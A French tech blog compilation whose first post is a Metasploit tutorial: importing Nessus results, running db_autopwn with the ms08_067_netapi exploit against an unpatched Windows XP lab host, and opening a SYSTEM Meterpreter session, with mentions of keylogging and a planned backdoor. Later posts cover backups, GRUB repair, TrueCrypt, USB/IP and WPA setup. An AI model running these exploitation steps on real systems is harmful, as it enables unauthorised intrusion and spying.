L’exploitation de faille est un moment excitant. Toutes les recherches engagées vont normalement porter ses fruits. Nous allons enfin explorer les faiblesses d’un réseau ou d’un système.
Suivant les vulnérabilités, il y a des tonnes de possibilités en matière d’exploitation. Si vous voulez en savoir plus, faites comme moi et achetez un bon bouquin relatant des techniques de Hacking. Vous comprendrez mieux quelles sont les différentes méthodes pour exploiter une faille, ainsi que les différents types de failles.

Comme il existe beaucoup de types de failles, et énormément de méthodes, je m’arrêterai sur un cas général, en appliquant une technique « classique ».

Après avoir collecté un tas d’informations sur le réseau, ainsi que sur la machine ciblée, nous avons évaluer ses vulnérabilités. Rappelez-vous de notre bon ami Nessus qui nous a clairement indiqué que la machine cible avait comme système d’exploitation Windows XP SP3, et proposait le service de système de fichiers réseau CIFS. Seulement voilà, cette machine est vulnérable. Non pas parce qu’elle utilise ce service, mais parce que l’administrateur de la machine n’a pas pris le temps de mettre à jour régulièrement son système d’exploitation via Windows Update, ainsi que l’antivirus

Sachez que les tests réalisés en réseau local ont été effectué avec l’antivirus Avira Antivir (ainsi qu’une base de données antivirale de moins d’un an), sur un Windows XP SP3 sans mises à jour récentes.

Vous serez surpris de voir qu’il existe énormément d’ordinateurs au monde dans ce cas là. Ils sont souvent la proie des virus sur Internet (qui aident notamment à réaliser des attaques DDoS (Distributed Denial of Service).

Dans notre étude de cas, nous allons utiliser Metasploit Framework (MSF).

Sa base de données contient tous les exploits / payloads connus à ce jour. Bien entendu, pour une bonne utilisation de cet outil, il est important de le mettre à jour régulièrement (voir même avant chaque utilisation) avec la commande « msfupdate« .

Dans un terminal, démarrez l’outil « msfconsole« .

root@root:~# msfconsole
 
_
| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
 
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
 
msf >

Nous allons utiliser le résultat du scan Nessus exécuté dans dans la recherche de vulnérabilité (dernier article), et l’importer dans une base de données SQL :

msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.129
[*] Successfully imported /root/nessus_report_Win.nessus
msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.132
[*] Successfully imported /root/nessus_report_Win.nessus

MSF connaît maintenant votre victime : comment la joindre, et surtout quelles sont les vulnérabilités trouvées par Nessus.

Nous allons lancer une commande qui va automatiquement exploiter l’un des failles disponibles afin d’obtenir une session avec la machine distante. Admirez le travail :

msf > db_autopwn -x -e
[*] (1/3 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.128.132:445...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.128.138:48400 -> 192.168.128.132:6313) at 2011-09-05 09:40:24 -0400
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...

0wned ! Le tour est joué, la machine distante est prise au piège. Nous avons utiliser l’exploit ms08_067_netapi pour pénétrer le système.
Pour retrouver une session ouverte, il suffit d’exécuter cette commande :

msf > sessions -l
 
Active sessions
===============
 
  Id  Type                   Information                           Connection
  --  ----                   -----------                           ----------
  1   meterpreter x86/win32  AUTORITE NT\SYSTEM @ VICTIME-484AF1D  192.168.128.138:48400 -> 192.168.128.132:6313

Et maintenant ?

Maintenant passons aux vilaines choses.
Pour obtenir le shell d’une session ouverte, il suffit de l’appeler par son ID :

session -i 1

Ensuite, la commande « help » vous éclairera sur la suite. Vous pouvez par exemple explorer les fichiers, prendre une capture d’écran, enregistrer les touches du clavier utilisées et encore plein d’autres trucs, dont des tâches administratives.

Cependant, un hacker ayant obtenu le shell d’un système essaye dans la plupart des cas de rester discret.
Dans le prochain article, nous allons voir comment installer un « backdoor » afin de pouvoir revenir plus tard sur le système sans exploiter de faille.
Ah oui, j’oubliais. Backtrack fournit une excellente interface graphique à MSF : « Armitage« .

Par rapport aux autres articles, aucune nouveauté en matière de lutte contre ce genre d’attaque. Un antivirus à jour, un pare-feu bien configuré, un système d’exploitation récent et à jour suffiront à éviter ce genre d’exploitation.

Aujourd’hui, les systèmes les plus vulnérables sont les sites Web qui sont très souvent victimes d’injections SQL permettant de récupérer des fichiers importants, et de compromettre la sécurité du serveur, et donc du réseau tout entier.

Hop, c’est cadeau, voici un script tout simple pour sauvegarder automatiquement et périodiquement son site web :

• sauvegarde périodique (les fichiers sont conservés 15 jours)
• sauvegarde des bases de données (variables à changer)
• sauvegarde des fichiers du site (chemins à changer)

Ce n’est qu’un squelette, et vous êtes libres d’y ajouter votre grain de sel, n’hésitez pas à l’améliorer et à le partager ici !

#!/bin/sh
 
#définitions des variables :
datedujour=$(date +%Y%m%d)
fichierdujour=$(date +%Y%m%d)-SqlBackup.tar.gz
datequinze=$(date -d '15 days ago' +%Y%m%d)
 
# On afficher les infos date du jour et autre pour le log.
echo "Date du jour : $datedujour"
echo "Fichier du jour : $fichierdujour"
echo "Date il y a 15 jours : $datequinze"
 
#On supprime  toutes les sauvegardes existantes dans le dossier d'exécution
rm -f *.sql
 
# La commande dump :
mysqldump -h localhost -u LOGIN_BDD -pPASSWORD NOM_BDD > BDD.sql
 
#on archive tous les backups dans un zip a la date du jour
# tar czf $fichierdujour *.sql
 
#on sauvegarde les fichiers du repertoire web
tar -cvzf www.tgz /public_html/
 
#on cree le répertoire du jour et y place les backups
mkdir ~/backup/auto/$datedujour
mv *.sql  ~/backup/auto/$datedujour/
mv www* ~/backup/auto/$datedujour/
 
#on supprime le répertoire d il y a 15 jours s'il existe
if test -d ~/backup/auto/$datequinze; then
echo 'suppression des anciens backups vieux de 15 jours ou plus'
rm -rf ~/backup/auto/$datequinze
fi
 
#on supprime le tar.gz du jour
rm -f $fichierdujour

Puis exécuter :

crontab -e

Pour y ajouter la cron suivante :

0 0 * * * /root/scripts/backup.sh

Je peux maintenant dormir tranquille, cron s’occupe de tout…

J’étais sous Ubuntu 10.10, et je désirais tester Ubuntu 11.04 sur mon ordi perso.

C’est pas la première fois que je fais ça, je sais pas ce qu’il m’est arrivé, mais j’ai démarré la mise à jour à 22h. J’ai fait le rêve de croire que ça serait finit vers minuit, et hop au dodo la conscience tranquille… mais c’était loin d’être le cas, et je peux vous dire que je n’ai pas dormis sur mes petits lauriers. Bref, je vais vous présenter les difficultés que j’ai rencontrées et qui apparemment concernent pas mal de monde.

sudo mount /dev/sdXx /mnt
sudo mount -o bind /dev /mnt/dev
sudo mount -o bind /sys /mnt/sys
sudo mount -o bind /proc /mnt/proc
sudo chroot /mnt

grub-install /dev/sda

update-grub

find -iname *compiz*

Si vous pouvez encore fermer votre session, ou accéder à un terminal pour vous déconnecter, faites-le… sinon faites le gros bourrin en utilisant la commande « shutdown –boutton » (cette commande n’existe pas, c’est de l’humour ).

Aujourd’hui, c’est un moyen de protéger ses fichiers que nous allons voir ensemble.

Certains mots reviennent toujours, comme par exemple le chiffrement qui est d’actualité. En effet, protéger vos fichiers revient à les mettre non seulement en lieu sur, mais surtout accessible que par vous même.

En premier lieu, nous pouvons définir quels types de fichiers il est intéressant de protéger :

• vos fichiers liés à votre vie privée (extraits de compte bancaires, documents officiels, fichiers de mots de passe, etc)
• vos fichiers professionnels (confidentiels ou non, ils ne regardent que vous)
• et tout autre fichier sensible comme vos certificats SSL par exemple, ou encore des documents secrets.

Voici maintenant plusieurs situations qui ne sont que des exemples, mais qui peuvent corrompre vos informations personnelles rapidement :

• vol, ou perte d’ordinateur (contenant un ou plusieurs disques durs)
• piratage de votre système (via Internet, ou le réseau de votre entreprise)
• accès à votre ordinateur par d’autres personnes (collègues ou amis)

Brefs, dans tous les cas, nous avons tous des fichiers sensibles, et nous allons voir comment les garder bien au chaud.

Une solution très efficace : Truecrypt .

C’est un logiciel qui permet deux choses :

• chiffrer des données à la volée (par un simple copier collé)
• stocker ces données soit dans un fichier qui sera monté comme un volume, soit sur une partition qui sera au préalablement formatée par Truecrypt.

L’avantage d’une telle solution est tout d’abord l’impossibilité pour une personne tierce de voir que vous utilisez un moyen de chiffrement. Le fichier ou le périphérique est complétement anodin, et vous offre le déni plausible dans une situation de force. En d’autres termes, personne ne vous mettra le couteau sous la gorge pour vous demander un mot de passe, puisque vos données sont stockées dans un fichier chiffré, qui n’a aucune apparence d’un fichier chiffré.

Nous allons voir l’utilité de ces deux fonctionnement possibles, mais avant tout sachez une chose : vos volumes seront protégés par un mot de passe, et si vous avez envie de renforcer la sécurité, par une clé SSL. Il est primordial de ne pas oublier ce mot de passe, sinon vos fichiers seraient perdus à jamais. De plus, il est bon de rappeler d’avoir des sauvegardes sur plusieurs périphériques différents, au cas où l’un deviendrait défectueux. Bon c’est finis, j’arrête de vous plomber le moral, et je passe à l’action.

• Téléchargement de Truecrypt

Ce logiciel est gratuit, et dispose d’une licence dite libre par les éditeurs, mais reconnue non open-source par certaines distributions Linux. Il fonctionne sous Linux, Mac OS X et MS Windows. Les données chiffrées sur un système d’exploitation sont bien entendu accessibles depuis un autre.

Voici le lien de téléchargement.

Pour le paquetage linux, je vous suggère la version « standard » qui comprend une interface graphique. Cependant, sur un serveur, la version « Console-only » sera la plus appropriée.

Il s’installe simplement en exécutant le binaire téléchargé, rien de bien compliqué.

• Utilisation de Truecrypt par la création d’un fichier

Nous l’avons dit plus haut, vous avez la possibilité de créer un fichier vide dans lequel vous placerez vos fichiers confidentiels. Ce fichier sera de taille fixe, et entièrement chiffré avec plusieurs algorithmes. C’est donc un moyen très facile pour envoyer des fichiers de manière ultra sécurisée par e-mail, par FTP, ou encore si vous devez les stocker sur une clé USB.

Cliquez sur « Volumes« , puis sur « Create New Volume » (chez moi c’est en anglais !). Choisissez ensuite « Create an encrypted file container » (1er choix par défaut). Pour la suite, un volume standard fera l’affaire dans la plupart des situations. Mais sachez qu’il est possible de créer un volume caché sur une partition. Il convient ensuite de choisir l’emplacement du fichier à créer, et son nom.

Ensuite, ce sont les algorithmes de chiffrement qu’il faudra sélectionner. Pour des petits volumes (5 Mo par exemple), je suggère la combinaisons des algorithmes « Serpent-Twofish-AES« , qui permettra une vitesse d’écriture d’environ 70 Mo/s selon votre matériel. Pour des gros volumes, vous pouvez soit utiliser la même chose que précédemment, tout en assumant la vitesse lente de copie, ou alors opter pour un seul chiffrement comme par exemple « Serpent », qui propose une vitesse moyenne d’écriture 130 Mo/s.

Personnellement, tous mes volumes utilisent « Serpent-Twofish-AES« , histoire n’être vraiment protégé. Les informations du volumes (mot de passe, etc) sont hachées, par l’algorithme de votre choix. Mon choix par défaut est « SHA-512″, développé par la NSA (oui, donc vous comprenez pourquoi je l’ai choisis !).

Il faut maintenant choisir la taille du fichier. A vous d’estimer combien de mémoire il vous faudra pour stocker vos fichiers confidentiels, sachant que pour un volume d’1 Mo, seuls 746 Ko seront disponibles.

Une fois votre fichier créé, il va falloir le « monter » avec Truecrypt. Dans la fenêtre principale, choisissez un slot de libre, puis cliquez sur « Select File« . En cliquant sur « Mount« , il vous sera demandé le mot de passe, et si besoin les clés SSL pour ouvrir le volume.

Copier vos fichiers dans ce volume reviendra à les chiffrer à la volée.

• Utilisation de Truecrypt par la création d’une partition

Si vous souhaitez protéger des fichiers présents sur votre ordinateur, il serait préférable de créer une partition qui serait dédiée.

Le principe de création est le même que pour un fichier conteneur.

Le mieux est de disposer d’une partition au préalablement formatée en NTFS. Truecrypt se chargera de la reformater avec les algorithmes choisis. Si vous ne savez pas lesquels choisir, reportez vous au paragraphe précédent.

Attention cependant sous MS Windows où la partition apparaitra comme une partition non formatée. Une fois montée, pas de soucis accéder librement à vos fichiers ! Ne vous faites pas avoir !

La partition se monte également avec Truecrypt en cliquant sur « Select device« , puis en sélectionnant le périphérique voulu.

Personnellement, j’utilise cette méthode pour conserver sur mon ordinateur des fichiers sensibles.

Sachez toutefois qu’il faut démonter le volume une fois que vous quitter votre ordinateur :

• Sous MS Windows, une déconnexion d’utilisateur n’entraine pas le démontage du volume, attention donc si vous utilisez des sessions !
• Les fichiers étant montés sur l’ordinateur, restent à la merci de tout pirate ayant accès à votre ordinateur.

Il faudra donc éviter de mémoriser les mots de passe des volumes (en désactivant l’historique), ainsi que de les laisser ouverts.

Enfin, je vous conseille vivement un mot de passe long et compliqué (au moins 15 caractères avec des lettres, des chiffres et des symboles). Par exemple, une phrase mnémotechnique peut faire l’affaire. En effet, avec un outil de bruteforce il serait possible d’ouvrir le fichier ou périphérique au bout d’un certain temps. Plus votre mot de passe est long et dur, plus de temps il sera nécessaire pour accéder aux données.

• Conclusion

Truecrypt est un logiciel de chiffrement à la volée parmi tant d’autres.. Pas de backdoor, et le code source est complètement ouvert à tous.

Sachez que l’application est également disponible en « application portable » et qu’il est possible (et même conseillé) de changer les mots de passe des volumes autant de fois que l’on souhaite.

Protéger ses fichiers est aussi important que de protéger ses informations personnelles.

Dans un environnement toujours plus « online », il est plus que nécessaire d’utiliser ce type de solution. A bon entendeur !

[Edit] J’ai pris en compte vos commentaires, et je remercie des précisions qui m’ont été apportées. J’ai bien entendu corrigé le fait que Truecrypt n’est pas un logiciel reconnu comme libre. Merci de faire vivre ce blog !

Je veux pouvoir transformer mon imprimante USB en imprimante réseau (et donc pouvoir l’utiliser et la contrôler partout chez moi).

La première solution qui s’offre à vous consiste à acheter un appareil qui partage sur le réseau les périphériques USB. Prévoyez un budget minimum de 100 euros pour avoir quelque chose de bien.

Mais heureusement que l’Open-Source est là, et nous allons nous débrouiller nous même, avec un budget de… 0 euros !

USB/IP est une excellente solution logicielle.

Procédure coté serveur

1- Téléchargez le logiciel présent dans les dépôts Debian / Ubuntu :

sudo aptitude install usbip

Vous devez charger les modules suivants pour être capable de contrôler vos ports USB :

sudo modprobe usbip
sudo modprobe usbip_common_mod

Pour démarrer le service « usbip » comme un démon :

sudo usbipd -D

Le message suivant s’affiche.

Bind usbip.ko to a usb device to be exportable!

Pas de panique ! C’est normal. Cela signifie vous devez choisir quel sera le port USB à partager.

1- Branchez votre appareil USB (imprimante, webcam, etc…)

2- Exécutez la commande pour trouver l’identifiant du vendeur et de l’appareil :

lsusb

Il est sous la forme :

Bus XXX Device ZZZ: ID VendorID:DeviceID

Les identifiants Vendeur / Appareil (Vendor / Device) sont codés sur 4 digits chacun (03f0:7a11 par exemple).Le premier (03f0) est pour Hewlett-Packard (qui est la marque de mon imprimante), et le second (7a11) est l’appareil USB (ici, mon imprimante en elle même).

Maintenant que nous avons trouvé les identifiants matériel, nous sommes capable de localiser sa position sur le bus.

sudo usbip_bind_driver –list

Résultat :

busid 2-1.2 (03f0:7a11)
2-1.2:1.0 -> none
2-1.2:1.1 -> usblp
2-1.2:1.2 -> none
2-1.2:1.3 -> usb-storage

Trouvez l’identifiant du bus sur lequel est notre imprimante. Ici, c’est « 2-1.2 ».

Il est temps maintenant de connecter l’appareil USB au réseau :

sudo usbip_bind_driver –usbip 2-1

Vous devez avoir une réponse finale du genre :

** Message: bind 2-1.2 to usbip, complete!

Une fois cette commande exécutée, le serveur est maintenant en écoute sur le réseau dans l’attente de connections clients.

Procédure coté client

Installation du logiciel :

sudo apt-get install usbip

Chargez le module « vhci-hcd » :

sudo modprobe vhci-hcd

Pour lister les périphériques USB disponibles sur le serveur :

sudo usbip -l <@ ip>

Bien entendu, remplacer <@ ip> par l’adresse IP du serveur.

Enfin, la commande qui nous apporte un nouveau périphérique USB :

sudo usbip -a <@ ip> X-Y

Remplacer X-Y par le l’identifiant du bus (2-1.2:1.1 pour l’exemple de tout à l’heure).

Si tout va bien, le périphérique est maintenant reconnu par le système. Si c’est un périphérique amovible, le périphérique sera monté; dans le cas d’une imprimante, il faudra l’installer comme une imprimante normale.

Sachez également logiciel client existe aussi sous Windows et je vous donne même le lien de téléchargement.

Tout d’abord, il faut extraire l’archive téléchargée.
En premier lieu, il faut installer le driver en cliquant droit sur le fichier bus.inf, puis sur « Installer ».
Ensuite, exécutez une invite de commande Windows (Menu Démarrer, Exécuter, « cmd »).
Avec la commande « cd » (comme sous Linux !), déplacez vous dans le répertoire où se trouve l’exécutable d’usbip.

Pour lister les périphériques USB disponibles sur le serveur (dans une invite de commande) :

usbip.exe -l <@ ip>

Et ensuite, la commande qui nous apporte un nouveau périphérique USB :

usbip.exe -a <@ ip> USB-ID

C’est bon ! Le périphérique USB doit maintenant être détecté par Windows !

J’espère avoir été clair sur les explications. Si vous avez suivi ce que j’ai fait à la lettre, tout devrait fonctionner. Sinon, vérifiez bien que vous avez choisi le bon identifiant du périphérique USB.
J’ai testé et ça fonctionne : Imprimante USB transformée en imprimante réseau, disque dur USB partagé sur le réseau, Webcam utilisée comme caméra de surveillance.

Le magazine Linux Identity publie fin du mois une édition spéciale, en quelque sorte destinnée aux débutants désirant de « lancer » dans l’univers palpitant de Linux : Linux Starter Kit.

Donc au programme, installations, comment faire cohabiter Ubuntu avec Windows, pas mal d’articles sur les applications intéressantes, et plein de trucs et astuces pour mieux utiliser son ordinateur.

Le magazine traîte surtout sur la distribution Ubuntu 9.10 Karmic Koala, en raison de sa popularité écrasante. Mais la pluparts des logiciels libres évoqués sont présents dans d’autres distrib’, donc pas de panique !

Bon je n’en dis pas plus !

Alors je vous donne rendez-vous dans quelques jours, dans votre kiosque, vous savez ce qu’il vous reste à faire !

NdM : Vous vous demandez certainement comment suis-je aussi bien informé, c’est parce que j’ai écris quelques articles pour le magazine.

Vous le savez certainement mais je préfère le rappeler que le WPA (Wifi Protected Access) est le moyen le plus sécurisé (à l’heure où j’écris ce billet) pour sécuriser un réseau Wifi. Contrairement aux faiblesse du WEP, WPA n’est “crackable” uniquement par la méthode bien connue du brute force.

Nous en sommes actuellement à la version WPA2 basé sur les protocoles AES et CCMP.

Si votre routeur Wifi ou votre BOX est dotée d’une clé WEP, je vous conseille vivement de changer pour le WPA qui vous évitera peut être des ennuis.

Nous allons installer les paquets nécessaires :

apt-get install wireless-tools module-assistant rt2500-source
module-assistant auto-install rt2500-source
insmod /lib/modules/2.6.21-2-686/kernel/drivers/net/wireless/rt2500.ko
lsmod

“rt2500″ doit être affiché dans la liste. Si c’est bon, continuons, sinon c’est que la paquetage n’a pas été installé. Dans ce cas, recommencez.

Pour ceux qui n’utilisent pas Debian et qui n’ont pas les paquets dans leurs dépôts, il y existe encore l’ancienne méthode :

cd /usr/src/modules
wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz
tar -zxvf rt2500-cvs-daily.tar.gz
rt2500-cvs-2006071214/Module
make
make install

insmod rt2500.ko
lsmod

rt2500 doit être dans la liste !

iwlist ra0 scan // Pour tester que l’on reçoit bien le signal Wifi.

Nous allons maintenant éditer le fichier de configuration réseau :

vim /etc/network/interfaces

auto ra0
iface ra0 inet dhcp
pre-up ifconfig ra0 up
pre-up iwpriv ra0 set AuthMode=WPAPSK
pre-up iwpriv ra0 set EncrypType=AES
pre-up iwconfig ra0 essid “NOM_DU_WIFI” // VALEUR A CHANGER (ESSID)
pre-up iwpriv ra0 set WPAPSK=”CLE_WPA” // VALEUR A CHANGER (Clé WPA)

L’ordre est important ainsi qu’un /etc/init.d/networking restart

Et le tour est joué, votre réseau wifi protégé par une clé WPA-AES est maintenant accessible sur votre machine automatiquement, même au démarrage !

Il existe bien sur des outils en interface graphique tel que wpa-gui mais l’ancienne méthode est des fois plus efficace…

Référence